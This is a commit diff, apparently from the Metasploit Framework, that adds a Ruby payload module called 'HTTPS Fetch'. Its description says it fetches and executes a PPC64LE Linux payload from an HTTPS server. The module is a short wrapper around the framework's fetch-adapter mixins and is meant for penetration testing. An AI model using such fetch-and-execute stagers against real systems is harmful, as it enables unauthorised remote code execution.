Add PPC64LE Fetch payloads
This commit is contained in:
@@ -0,0 +1,25 @@
|
||||
##
|
||||
# This module requires Metasploit: https://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
module MetasploitModule
|
||||
include Msf::Payload::Adapter::Fetch::Https
|
||||
include Msf::Payload::Adapter::Fetch::LinuxOptions
|
||||
|
||||
def initialize(info = {})
|
||||
super(
|
||||
update_info(
|
||||
info,
|
||||
'Name' => 'HTTPS Fetch',
|
||||
'Description' => 'Fetch and execute a PPC64LE payload from an HTTPS server.',
|
||||
'Author' => ['Brendan Watters', 'Spencer McIntyre'],
|
||||
'Platform' => 'linux',
|
||||
'Arch' => ARCH_CMD,
|
||||
'License' => MSF_LICENSE,
|
||||
'AdaptedArch' => ARCH_PPC64LE,
|
||||
'AdaptedPlatform' => 'linux'
|
||||
)
|
||||
)
|
||||
end
|
||||
end
|
||||
Reference in New Issue
Block a user